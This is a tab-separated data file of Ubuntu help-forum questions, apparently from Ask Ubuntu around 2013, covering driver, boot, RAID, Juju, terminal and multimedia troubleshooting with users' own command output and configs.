318947	ctrl+shift+v does n't paste to terminal now ?	i am used to copy and pasting into the terminal and out using ctrl+shift+v to paste . but on raring , this key command seems to not work ? ctrl+shift+c does copy though . how can i fix the terminal to have the old key bindings ?
318949	vlc unable to play mp4 files downloaded from youtube	regarding the above , not sure what happen since previously i could play any files i download from youtube , be it avi or mp4 . now i can not play any mp4 file downloaded from youtube but no issue to play any other file format ( avi , mov , flv using vlc . some other mp4 files that was downloaded from different source other than youtube are able to play .
318951	how to use open ssh key ?	i got a ssh key in ppk format . i found some manual to convert it to an open ssh key . now i just want to connect to the server using this key . the manuals i find are all about creating one . do i have to put the key in the .ssh folder ? or can i include the file in a ssh command ?
318953	mdadm - degrading when copying files to share	we have a ubuntu 12.04 lts server which is configured with a 2 disk software 1 raid ( mdadm ) . the disks are 3tb and partitioned with a 1mb gpt partition and with the remaining assigned to the raid . the raid partition is then allocated as lvm volume group and hosts three logical partition for the /boot , / , swap . following the system being built we tested it by removing a disk and all worked well . we then replaced the disk and re-add the disk back into the raid . we have now installed samba on the system and are trying to copy 200gb of data to a subfolder of the root partition . every time we do this the raid degrades and one of the partitions sda2 or sdb2 drops off ( removedo ) . i ca n't see any errors in the logs as to the cause for this . recommendations or suggestions as to where we may find the cause would be greatly appreciated .
318960	how to change charm service ip from default 10.0.0.x if running juju on local ?	i set up a private cloud on local following by https : //juju.ubuntu.com/get-started/local/ and configured network followed by how do i run juju on a local server ? ( the difference is the ip address in my setup is 10.200.xx.xx rather than 192.168.x.x ) however , after juju deploy and expose a charm , the charm state is always pending and public url is null ... .i do n't know the root cause , can anyone tell me some prerequisites of setting up the juju on local , say , do i need to set up a dns server on the host , etc ? thanks !
318962	how can i disable the `` no mail '' notice on text-based login sessions ?	i have had an ubuntu server ( 12.04.2 ) running for quite some time . it runs a variety of server apps , including hosting my personal website . i was playing around with woocommerce on wordpress the other day , and wanted to figure out how to get the email notifications to work . in my endeavors , i installed ( and uninstalled ; well , apt-get purge'ed ) both sendmail and postfix . after i was done playing , and uninstalling everything i had installed ( since i could not get either to work ) , i noticed that a prompt telling me that i had mail would pop-up every time i logged onto the system . first i thought , oh , i just need to mark 2000 mails as read . i did that ( thankfully there are ways to do this without going through 8+ months of mail that i did n't even know i had ) . but now the prompt loves to tell me that i have 'no mail . ' how can i get rid of this prompt ? it drives me crazy . i went many , many months without it , and i do n't need it or the mail that it wants to tell me i have . even better , can i turn off the local mail system entirely ? thanks for your help . :0 )
318965	how to change shutdown script timeout ?	i have a script running at shutdown of my server , it was added to rc.d scripts with update-rc.d local.shutdown stop 20 0 1 6 . the problem is that this script takes a few minutes to complete it 's operations , but the system terminates earlier . is there a config value to set , that will extend timeout given to shutdown scripts ? i was testing how long will it take to kill a long running shutdown script . i have created a very simple infinite loop with : while true ; do time > > /root/watch.txt ; sleep 1 ; done ; that script logged about 2 minutes of execution before it was killed .
318970	how do i get juju 1.11 to bootstrap on a private openstack cloud ?	i have a working private openstack installation and am trying to use juju . as follows : dave @ dave-d945gtp : ~ $ juju version 1.11.2-raring-amd64 dave @ dave-d945gtp : ~ $ juju sync-tools listing the source bucket found 6 tools found 6 recent tools ( version 1.10.0 ) listing target bucket found 0 tools in target ; 6 tools to be copied copying tools/juju-1.10.0-precise-amd64.tgz , download 2205kb , uploading copying tools/juju-1.10.0-precise-i386.tgz , download 2306kb , uploading copying tools/juju-1.10.0-quantal-amd64.tgz , download 2209kb , uploading copying tools/juju-1.10.0-quantal-i386.tgz , download 2311kb , uploading copying tools/juju-1.10.0-raring-amd64.tgz , download 2208kb , uploading copying tools/juju-1.10.0-raring-i386.tgz , download 2312kb , uploading copied 6 tools so far , all seems good . however , it fails to bootstrap : dave @ dave-d945gtp : ~ $ juju -v bootstrap 2013-07-11 09:34:17 info juju provider.go:117 environs/openstack : opening environment `` openstack '' 2013-07-11 09:34:17 info juju provider.go:467 environs/openstack : bootstrapping environment `` openstack '' 2013-07-11 09:34:27 info juju tools.go:25 environs : reading tools with major version 1 2013-07-11 09:34:27 info juju tools.go:52 environs : filtering tools by series : precise 2013-07-11 09:34:27 info juju tools.go:75 environs : picked newest version : 1.10.0 2013-07-11 09:34:28 error juju supercommand.go:234 command failed : can not start bootstrap instance : no `` precise '' images in regionone with arches [ amd64 i386 ] error : can not start bootstrap instance : no `` precise '' images in regionone with arches [ amd64 i386 ] a swift container named 'juju-cece0b9817a68cba4780784bf0663e45 ' containing a tools `` directory '' ( with the six files obtained via juju sync-tools ) and a bootstrap-verify file is successfully created . my .juju/environments.yaml is as follows : default : openstack environments : # # https : //juju.ubuntu.com/get-started/openstack/ openstack : type : openstack # specifies whether the use of a floating ip address is required to give the nodes # a public ip address . some installations assign public ip addresses by default without # requiring a floating ip address . use-floating-ip : true admin-secret : sekret default-series : precise # globally unique swift bucket name control-bucket : juju-cece0b9817a68cba4780784bf0663e45 # usually set via the env variable os_auth_url , but can be specified here auth-url : http : //10.103.8.1:5000/v2.0/ # override if your workstation is running a different series to which you are deploying # the following are used for userpass authentication ( the default ) auth-mode : userpass # usually set via the env variable os_username , but can be specified here username : admin # usually set via the env variable os_password , but can be specified here password : sekret # usually set via the env variable os_tenant_name , but can be specified here tenant-name : admin # usually set via the env variable os_region_name , but can be specified here region : regionone after some reading , i determined that i apparently need to upload a `` precise '' image and run juju image-metadata . i created the metadata as follows ... dave @ dave-d945gtp : ~/.juju $ juju image-metadata -a amd64 -e http : //10.103.8.1:5000/v2.0 -i d7e2ea12-cb50-4687-b5e1-d90f0656164a -n openstack -r regionone -s precise ... and moved the resulting files to `` streams/v1 '' in the juju-cece0b9817a68cba4780784bf0663e45 container . juju bootstrap -v produced exactly the same result . i also tried copying openstack-index.json and openstack-imagemetadata.json to index.json and imagemetadata.json , respectively , based on some content i found in a ( probably irrelevant ) bug report . again , juju bootstrap -v produced exactly the same result . any suggestions ?
318973	how do i create a wifi hotspot sharing wireless internet connection ( single adapter ) ?	i know how to create a hotspot when connected to a wired network , but when i am using internet from a wifi connection , this disconnects the wireless connection the moment i activate the hotspot . in windows i can use connectify hotspot , which enables me to share the internet connection from the same wireless adapter as i am creating an access point on . as you can read on the technology overview page : access point mode allows you to create a hotspot using the same wi-fi card that you are using to access the internet . how do i do this on ubuntu ?
318975	how do i extract make-3.81.tar.gz ?	i am new at linux , and am currently using ubuntu in a dual-boot with windows 7 . i 'm trying to install make such that i can build a program given to me with it . i can see the make-3.81.tar.gz , but do n't know how to extract it for reference , i have this file in /host/linux/make edit i do not have internet access on this computer
318983	how to remove unwanted exe files/programs	how to remove torntv program from ubuntu 12.04
318987	ubuntu does n't `` see '' external usb hard disk	it 's ntfs . it 's usb2 . i 'm using ubuntu 13.04 . it works perfectly fine on windows ( which excludes cable and hardware problems ) . i have two ubuntu computers and it 's not detected on either . it 's about 500 gb . edits : following the first link , i input sudo lsusb in a terminal ; before and after connecting the hdd . the difference was bus 001 device 012 : id 14cd:6116 super top m6116 sata bridge . there it is ! ( `` sata bridge '' used to appear in a windows notification when i plugged in the hdd in ! ) . ... this means that ubuntu detects it but is it not mounting it ? i tried this : sudo mount /dev/sdb1 /mnt but gives this : mount : special device /dev/sdb1 does not exist i also tried : sudo mount /dev/sdc1 /mnt but it stays with no output forever . i left it in background for about 30 min.s . sudo fdisk -l gives out this : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa42d04a3 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 80325 102481919 51200797+ 7 hpfs/ntfs/exfat /dev/sda3 263874558 312580095 24352769 5 extended /dev/sda4 102481920 263872511 80695296 7 hpfs/ntfs/exfat /dev/sda5 263874560 310505471 23315456 83 linux /dev/sda6 310507520 312580095 1036288 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdc : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5822aaea device boot start end blocks id system /dev/sdc1 2048 976769023 488383488 7 hpfs/ntfs/exfat the part below `` partition table entries are not in disk order '' takes about 5 minutes to appear . the outputs of ls /dev/ | grep sd before and after connecting the hdd : before : sda sda1 sda2 sda3 sda4 sda5 sda6 , after : sda sda1 sda2 sda3 sda4 sda5 sda6 sdd sdd1 the second output has the lines sdd and sdd1 different from the first one . it showed the files ! ! the command sudo mount /dev/sdd1 /mnt worked after i typed in sudo fdisk -l ! ! ! thanks a million ! ! : ) : )
318992	i have a problem about updating in terminal	here is the link , please help me what it means below : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 what should i do with the link above
318994	facebook notifications keep popping up	i have set up the facebook account in the online accounts in ubuntu 13.04 . it 's supposed to show me facebook notifications on time ; instead , it continues to show old notifications at a fixed time for several days . how can i fix this ?
319006	games wo n't run after installation and removal of nvidia driver	i 'm running ubuntu 12.04 lts . some months ago i installed amnesia - the dark descent which uses 3d graphics and therefore refused to run using nouveau . so , after having no luck using the additional drivers application , i downloaded the appropriate nvidia driver ( nvidia-linux-x86_64-310.32.run ) from the nvidia website . i installed the driver with a little help from this page : how to install nvidia.run ? however , the screen resolution was far too low . i tried quite a few different solutions i found online involving xrandr and xorg.conf but they had no effect . in the end i removed xorg.conf which fixed the resolution problem but amnesia still did n't work and all my other games that previously worked fine would not even start up . plus whenever i logged into ubuntu the screen would flash grey for two seconds , which it did n't do before , and the unity toolbar scrolls down instead of having the extra icons bunched together at the bottom . so i gave up and left it as it was for a while and eventually i downloaded an update that somehow restored things to the way they were before ( games worked again , unity toolbar was back to normal and no more grey flash ) . later i tried again with a slightly more up to date nvidia driver ( nvidia-linux-x86_64-319.23.run ) , still with no success and with the same problems as before . i tried a few more solutions but ultimately decided that the nvidia driver is more trouble than it 's worth ( i 'll have to download the windows version of amnesia ) , so i tried to completely remove it and restore nouveau using this method : how can i uninstall a nvidia driver completely ? this still had no effect . now , when i type dpkg -l | grep -i nvidia nvidia-common is all that 's left but the games still wo n't run ( bit.trip beat throws up a message saying `` fatal error - failed to create sdl window : could n't find matching glx visual '' but the rest do nothing when i click on the icons ) , the screen still flashes grey on login and i still have to scroll down the unity bar . so , how can i get my games up and running again ? does anyone know what the update was that fixed things before ( there were a lot of updates at the time ) and how i can re-install that update ? are there still other nvidia files i need to remove ? thank you for your time . -- richard
319009	how can i maintain my system without a root password ?	is there a default root password for maintenance for ubuntu ? we have tried to reset the password and now it has a prompt for the root password for maintenance where do we go from here ? the computer that this is on is an acer aspire one zg5 with a ssd
319010	running out of space on a wubi install with a non-functional windows os	my ubuntu installed through wubi is running out of space : i have about 4 gb free . if i partition the part of my hard drive that has windows on it , will i lose ubuntu ? i 'm fairly sure i will and if so , is there any way i could burn a copy of ubuntu os onto a cd ? note , my windows 7 os is not able to run so i ca n't go into it to get anything out . the moment i try to boot into windows my computer crashes , which is why i 'm switching over to ubuntu . thank you for your help in advance !
319020	i want to download ubuntu 13.04 but i can not to do it	i love ubuntu and i use it since 1985 . i decided to download ubuntu 13.04 but i 'm a rookie . if you can send me a cd with that version i would be happiest .
319021	display larger than my external screen	i seem to have this problem every time i install ubuntu . i have a panasonic viera plasma 50 '' and the display area on it is always cropped i have tried all kinds of configurations with the terminal ( ie ... xrandr ) i am at a total loss and would like any advice as i am still moderately new to linux . thank you
319025	how do i make my system crontab fetch a url and email it to me ?	i am running ubuntu 12.04 with apache module . i opened crontab by executing vi /etc/crontab it says on the top that unlike any other crontab you do n't have to run the 'crontab ' command to install the new version . so i do n't have to run crontab crontab ? even if i am trying to execute it i receive the error crontab : no such file or directory i added this to the crontab file ( there are 4 default jobs there ) : */1 * * * * root http : //www.mywebsite.com/crondemo.php this file should send me a mail every minute . the script itself works fine , but the job never runs and i never get a mail .
319028	green tint on images	i have had ubuntu 13.04 for three weeks , i 'm an absolute beginner . some pictures ( when browsing through mozilla firefox ) have green tint . how to get rid of the tint ? i did n't find anything on google . the hp indicator is an hp printer . i checked the chromium - no such problem , it 's ok. maybe the problem relates only to facebook . i think the graphic card is dedicated as i have never done anything with it ( actually , i dont know where it is ) .
319033	what should i take intel paa / x86_64 gnu / linux	i have an intel graphics card on 3.5.0-36-generic # 57~precise1-ubuntu smp thu jun 20 18:21:09 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci-nnk | grep-i vga-a2 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c : 1858 ] kernel driver in use : i915 what a paa i need to take so that i have full power so i can play with steam ? will steam install to softwarecenter steam needs to install these additional packages : libgl1-mesa-dri-lts-quantal : i386 , libgl1-mesa-glx-lts-quantal : i386 , libc6 : i386 /usr/lib/nux/unity_support_test -p intel open source technology center opengl renderer string : mesa dri intel ( r ) sandy bridge mobile opengl version string : 3.0 mesa 9.0.3 not software rendered : yes not blacklisted : yes glx fbconfig yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4 + : yes unity 3d supported : yes and what / entries should be in my /etc/x11/xorg.conf : section `` screen '' section `` device '' cat /proc/cmdline boot_image=/boot/vmlinuz-3.5.0-36-generic root=uuid=d49f068f-52ac-47ed-8a03-71b7a69884f6 ro quiet splash vt.handoff=7 dmesg | grep i915 [ 1.155970 ] i915 0000:00:02.0 : setting latency timer to 64 [ 1.191712 ] i915 0000:00:02.0 : irq 43 for msi/msi-x [ 1.870345 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 5385.318716 ] i915 0000:00:02.0 : setting latency timer to 64 [ 18434.366480 ] i915 0000:00:02.0 : setting latency timer to 64 [ 23459.306806 ] i915 0000:00:02.0 : setting latency timer to 64 [ 24639.875228 ] i915 0000:00:02.0 : setting latency timer to 64 glxgears screenshot : http : //screencloud.net/v/9fm4 . running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 296 frames in 5.0 seconds = 59.110 fps 300 frames in 5.0 seconds = 59.912 fps 300 frames in 5.0 seconds = 59.902 fps 300 frames in 5.0 seconds = 59.900 fps 300 frames in 5.0 seconds = 59.904 fps xrandr -- prop . blockquote screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm edid : 00ffffffffffff0030e4840300000000 00160104902213780a01a59c595a9b26 18505400000001010101010101010101 010101010101d81d56f4500016302430 350058c21000001be51356f450001630 2430350058c21000001b000000000000 00000000000000000000000000000002 000c47ff0a3c6412222964000000007f backlight : 6 ( 0x00000006 ) range : ( 0,10 ) backlight : 6 ( 0x00000006 ) range : ( 0,10 ) scaling mode : full aspect supported : none full center full aspect 1366x768 60.1*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) broadcast rgb : full supported : full limited 16:2 audio : auto supported : force-dvi off auto on dp1 disconnected ( normal left inverted right x axis y axis ) broadcast rgb : full supported : full limited 16:2 audio : auto supported : force-dvi off auto on 7 . ) /etc/default/grub grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=lsb_release -i -s 2 > /dev/null || echo debian grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' currently have the paa # ppa : ubuntu-x-swat/x-updates sudo add-apt-repository ppa : ubuntu-x-swat/x-updates & & sudo apt-get update -y i have the following problem what should be in the xorg.conf ? what should be in the / etc / default / grub ? at the moment it shows me under this serious sam 3 bfe http : //screencloud.net/v/ex1g and is non playable and jerky sudo lshw -c video *-display beschreibung : vga compatible controller produkt : 2nd generation core processor family integrated graphics controller hersteller : intel corporation physische id : 2 bus-informationen : pci @ 0000:00:02.0 version : 09 breite : 64 bits takt : 33mhz fähigkeiten : msi pm vga_controller bus_master cap_list rom konfiguration : driver=i915 latency=0 ressourcen : irq:42 memory : c2000000-c23fffff memory : b0000000-bfffffff ioport:4000 ( größe=64 ) hwinfo -- gfxcard > hal.1 : read hal dataprocess 12471 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 08 : pci 02.0 : 0300 vga compatible controller ( vga ) [ created at pci.318 ] unique id : _znp.ndjonrrezd7 sysfs id : /devices/pci0000:00/0000:00:02.0 sysfs busid : 0000:00:02.0 hardware class : graphics card model : `` intel vga compatible controller '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x0116 subvendor : pci 0x103c `` hewlett-packard company '' subdevice : pci 0x1858 revision : 0x09 driver : `` i915 '' driver modules : `` drm '' memory range : 0xc2000000-0xc23fffff ( rw , non-prefetchable ) memory range : 0xb0000000-0xbfffffff ( ro , non-prefetchable ) i/o ports : 0x4000-0x403f ( rw ) irq : 42 ( 100414 events ) module alias : `` pci : v00008086d00000116sv0000103csd00001858bc03sc00i00 '' driver info # 0 : driver status : i915 is active driver activation cmd : `` modprobe i915 '' config status : cfg=new , avail=yes , need=no , active=unknown primary display adapter : # 8
319035	desktop internet shortcut opens as text file	i have two very similar .desktop launcher files that are to be used as internet shortcuts . when i double click on one file it opens properly in a webbrowser as i would like . when i double click on the other , it opens in a text editor which i do not like . how do i change this ? good shortcut opens in browser : [ desktop entry ] encoding=utf-8 name=safari books type=link url=http : //hdl.library.upenn.edu/1017/7026 icon=text-html name [ en_us ] =safari books bad shortcut opens in text editor : [ desktop entry ] encoding=utf-8 name=learning python type=link url=http : //proquestcombo.safaribooksonline.com/book/programming/python/9780596805395 icon=text-html name [ en_us ] =learning python
319049	can not install ubuntu 12.04.2 on windows 8 in legacy mode , no partitions detected in gparted ?	i want to dual boot ubuntu alongside windows 8 . windows 8 is installed in legacy mode ( not uefi ) . when i use a ubuntu 12.04.2 cd to install , it does not detect windows 8 . if i click on custom installation , it says that the entire hard drive is free space , i.e . does not detect any partitions . i also loaded a gparted iso , and that also failed to detect any partitions . fdisk -l returned nothing . any ideas on why windows 8 is not detected by ubuntu / no partitions are detected by gparted ? ps . please explain things simply if possible . i 'm a linux noob ...
319051	can ubuntu be installed on a samsung galaxy nexus verizon 4g phone	i am an old man who is interested in seeing the ubuntu os used more widely . i read the instructions for flashing the os onto a samsung galaxy nexus cell phone . i ordered such a phone . when it came i started to follow the instructions on this page : https : //wiki.ubuntu.com/touch/install ? action=show & redirect=touchinstallprocess i watched a couple of youtube videos to guide me through the process . one video featured a young man who looked like he knew what he was talking about . he said that the samsung phone had to be a `` gsm '' something , which the verizon 4g model is not . i have three questions : must the samsung galaxy nexus phone indeed be a `` gsm '' in order to accept the ubuntu os ? if yes , could the instructions be made clearer to indicate this fact , as well as any other facts that civilians ( as opposed to professional developers ) might need to know in order to flash the os onto a phone ? if yes again , does anyone want to buy a slightly used samsung galaxy nexus verizon 4g cell phone cheap ? thanks . ~george
319054	intelpentium4 for ubuntu	can you please tell what version of ubuntu suitable for intel ( r ) pentium ( r ) 4 cpu 2.80 ghz , 2.79 ghz ,504 mb of ram computer .
319059	starting from a usb drive without booting	is it possible to start ubuntu from a usb drive without actually booting from it ? sorry this question did not seem clear . i have just placed ubuntu onto a 4gb flash drive . the computer i was going to use it on can not boot from a usb port . only a cd drive , hdd or floppy . so , can i get ubuntu started from the usb flash drive i have just created or do i need to create a cd ?
319061	maas / juju zookeeper issue	i have installed a maas server and created 3 nodes . the maas web gui states 3 nodes in maas , 3 nodes deployed . i created my envirment.yaml file and ran juju bootstrap , and it said it ran without issue . when i run juju status all it does is waits for zookeeper but i always get a connection refused . 2013-07-11 15:52:03,148:2744 ( 0x7f337d7fe700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:48855 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client i have read online that it just needs time but it has been stuck on this for over 24 hours . i can ssh to all three hosts from maas , and zookeeper is up and running on one of the nodes with 2181 listening . if i do juju ssh 1 then i get the same error . anyone have any idea ?
319067	is trim on by default in 13.04 ?	i 've just installed the ubuntu raring ( with sandisk extreme ) and i know there 're multiple articles over the internet ( and here ) about trim , but i suspect it 's a native resource on ubuntu raring . ps : tried to find something in the ubuntu 's documentation , but did not . then i 've read lots ( and lots ) of articles and all of them providing different ways to enable trim ( fstab , cron job , init scripts , etc .. ) . ie : how to enable trim ? and i got something interesting - > i 've performed those tests ( creating testfile / removing / running hdparm ) without `` discard '' in the /etc/fstab and i got that same results , i got those expected `` zeros '' output . that suggested trim test i 've uploaded ( just in case ) , http : //www.pasteall.org/43964/text that 's why i 'm wondering - > is the trim active by default on ubuntu raring ? if not .. any recommended way to active it , among so much options ? thx . ps : this is not the same question as the duplicated one . here i 'm trying to understand the native trim support ( as it looks like )
319068	can anyone tell me what i had to be careful with and how i can reinstall grub ?	i might install a 2nd linux system on my hd . i was told that i would have to reinstall grub to make the 2 system appear after i turn on my laptop . i also have widows installed ... so it might get a bit messy . i have just watched this video : http : //www.youtube.com/watch ? v=8lod8srb_6i and it is really informative , but i need a proper walkthrough to understand how this grub thingy works . can anyone redirect me to a video or webpage where someone explains this grub installation in case of secondary linux os in details ?
319073	how to update apache-utils 2.2 to 2.4 on ubuntu 12.04 lts ?	i started playing with ubuntu server edition . i 'm still extremely new to ubuntu , but i ca n't seem to figure this problem out . i am running ubuntu 12.04 lts server . i need to use htpasswd to generate some password hashes , but bcrypt is supported only in apache2-utils 2.4 . the latest version of this package is 2.2.22 in ubuntu 12.04 repository . i do n't want to install it by source since that is extremely messy and hard to remove it in the future . is there an official ppa by apache to get the latest version ? or is there a another relatively easy and secure way of updating to the latest ? thanks !
319077	booting and installing from usb	i 've been trying to install ubuntu ( server edition , 13.04 i386 ) through a usb pen drive , and so far i 've miserably failed . this is on a lenovo x230 , with usb-* options all up there in the boot order , as well as uefi / secureboot support disabled ( as it seems it messes with most linux distro ) . so far i 've tried this ( on my old ubuntu 10.04 , and sometimes , purely out of boredom , on win 7 ) : the native usb-creator-gtk proving to be useless ( i.e . crashed ) , i 've instead opted with unetbootin . invariably , it only gives me a `` boot error '' message when plugged in , and nothing more . i 've been careful to always format the usb drive first ( fat ) , through the graphical tool or some other console tool ( msdostk ... mtkdos ... something along those lines ) and shoot a `` sync '' as well as a `` eject /dev/sdx '' afterwards . copying directly the iso : using `` cat '' , `` cp '' or `` dd '' directly into the pen drive . most of the time , it would simply not boot . a few days ago i was trying my hand at installing debian , and this is the only thing i 've tried that actually worked , was to copy directly the netinstall image on the pen drive . unfortunately i 've had problems with that installation which are outside the scope of this post . as i was writing this , i was also trying out some other tool , universal usb installer ( win 7 , with the same iso as before ) . and lo and behold , the god forsaken pen drive did boot . only problem is it 's in rescue mode ( maybe ubuntu is recognizing the existing debian installation ? ) and even then , is insisting on mount the cd-rom drive ( which is inexistent ) . great . so at this point i 'm thinking it might have something to do with the pen drive itself ( although it is able to boot , albeit once in a goddamn blue moon ) or the laptop settings .
319082	gui application for perl scripts and cshell	i am a very green to linux . i am now taking a course at my studies basic of linux . as part of my assessment i need to do some perl scripts and c shell . but also we have been asked to build a gui app that will launch those scripts providing them as an input the strings the user will enter via gui . i am familiar with c , c # and java : what is the best way for me to develop a simple gui in ide that you just grab a button or whatever you need and place it on your screen and then just code ? ( i 'm running ubuntu 64-bit . )
319083	dual displays not working properly , getting only low resolution	my hardware : i just installed ubuntu 12.04.2 lts ( precise pangolin ) and i have been unable to get my dual 1920x1080 monitors working properly with my geforce gtx 670 ftw . the problem : whenever i get to the login screen both of my monitors display a purple back ground with small white dots and are mirroring each other ( i can still see the mouse and move it ) . in order to see the log in screen i have to unplug one of my monitors then plug it back in to the gpu , when i do this both monitors are now showing the login screen properly but are mirrored and stuck at a 1024x768 resolution and when i move my mouse to the right side of the screen the desktop slides over and disappears . when i move the mouse back over to the left of the screen the desktop slides back into place . what i have tried : i went into the display setting and tried to fix this but i am only given 1024x768 and 800x600 resolution options and when i unchecked mirror displays and click apply it defaults back to mirroring displays . i believe this is a driver issue but i have no idea now to fix it ideas ?
319085	how to get schiit modi usb dac working ?	i have a schiit modi usb dac . i can not get it to play audio . what should i configure to get this dac working ? what other relevant info should i provide ? the dac is known to be working ( works fine in osx and windows ) .
319087	miro and flash player problem	i have just installed ubuntu and it 's great . i also installed flash by following these instructions . after i wanted to download a video from youtube and i installed a software called miro that looks like some sort of browser . when i navigated to youtube it says no flash player downloaded . but if i use firefox , youtube works fine . help pls
319089	low frame rates on a nvidia 650 ti	i installed ubuntu 13.04 on a separate partition earlier today , and am dual-booting it alongside windows 7 . i did this to see if ubuntu would run seamlessly on my rig . currently , the cpu is an amd athlon ii x3 450 rana running at stock speeds , with 8gb ram . the card in question is a nvidia geforce 650 ti . i added xorg-edgers to my list of repos , and promptly installed the recommended drivers : 325.08 . after that , i installed compiz and ccsm . i also installed wine and steam to run world of warcraft and the test client for dota 2 , respectively . however , i am getting 30 fps while playing these games . i 'll get up to 60 fps while at the log-in screen . meanwhile i can run both games on high settings on w7 . i 've googled around to no luck . are the nvidia drivers just bad compared to their w7 counterparts ?
319091	why do i have to sign into ubunto one in order to install steam ?	the first time i installed steam for ubuntu was during the beta phase , and i ca n't remember i had to do anything special . a few months later , i 'm now on a fresh install of ubuntu ( 13.04 ) and want to install it again . first ascertainment : it seems that apt does n't know about steam : well , ok , perhaps because it 's not a free software there is some repository to add to apt before doing anything . let 's try with the ubuntu software center , which sometimes can find more than apt ( no idea why , by the way ) . for some reason , it will find steam ! but while it 's flagged as a free software , the only option here is to click a `` buy '' button : when i click it , it sends me to some ubuntu one login page . i never had to use ubuntu one before ; i do n't even know what it is exactly ( some sort of ubuntu cloud service ? ) questions : why can i find steam in the ubuntu software center but not in apt ? why the `` buy '' button right next to the `` free '' flag ( somehow related question ) ? why the ubuntu one sign in ? is it possible to circumvent it ?
319093	no login screen after 12.10 ubuntu update	i am running dual boot os machine including windows7 and ubuntu . few days back , i did update to 12.10 version , and at that time i was using gnome fallback desktop environment . while doing update , i could see in remove obsolete packages , it removed some gnome related files . and at that time i was using gnome fall-back desktop environment with clear looks theme , because i did not like unity much . when i restarted machine , it gave me option to select ubuntu / windows7 , when i selected ubuntu , it showed me ubuntu logo , but from that point , only black screen would remain there , and no login screen would come , no matter how far i waited . using advance options in menu ( and askubuntu/ubuntu forums ) i tried following methods , but to no avail . booting to old kernel 3.5 and 2.6/2.4 . dpkg-reconfigure gdm ( and both lightdm ) , setting it to lightdm . and restarting lightdm sudo /usr/lib/lightdm/lightdm-set-defaults -s ubuntu-2d ( no use ) chown username : username .xauthority ( its already on my username ) /etc/x11/default-display-manager to say /usr/sbin/lightdm ( it was already there ) and one more doubt : some solutions suggest to install and reinstall packages , for e.g sudo apt-get install -- reinstall ubuntu-desktop how do i install packages even after enabling networking , if i need a manual login , on web page provided by my isp for starting internet connection . machine : 32bit , intel pentium 4cpu 3.2 ghz , standard vga graphics adapter , 1gb ram
319099	copy file into clipboard line by line	so i 'm using the following script to copy a file line by line into the clipboard : perl -ne 'm/\t ( .+ ) \n/ ; open ( my $ pipe , `` |xclip -i '' ) ; print { $ pipe } $ 1 ; close ( $ pipe ) ; '\ 'print ; `bash -c `` read -p continue '' ` ' photo_captions.txt in case that 's confusing , my photo_captions.txt file contains lines like : img0001.jpg at the beach img0002.jpg at the bar where the captions are preceded by tabs . and the script is just capturing everything after the tab to the newline and stuffing it into xclip , printing that to standard out , and then asking the user to press enter to continue to the next line . [ the use of bash here is a travesty , or maybe it 's perl , either way it mostly works for me ] . like : at the beach continue at the bar continue what i 'd like to do , to make my life a lot easier as i page through photos i 've uploaded and paste captions into them , is to pass this whole file to some kind of clipboard manager and have that manager wait for me to paste line one , once pasted , the next paste will be line two , etc , avoiding my need to switch back and press enter to continue . fyi the script without the pause would either copy all the lines as a blob or copy only the last line discarding the previous ones . does anyone know of any such program ? update i tried the -l option of xclip , and basically my version of xclip does n't pause or wait correctly ; so echo hello|xclip -f -l 1 ; echo world|xclip -f -l 1 ; just outputs hello world and only pastes world once not pasting hello . yet if i add the -verbose flag it does wait , so that works . except in chrome , it does n't work in the chrome browser and pastes nothing . so there could be something wrong with xclip or chrome and i 'm still wondering if there 's another program that does this better .
319100	what does the 'tail ' command do ?	i 'm new to ubuntu . i previously ran a tail -f /var/logs/syslog and get the following displayed results : kernel : [ 2609.699995 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 1a0d0000 what does that mean ?
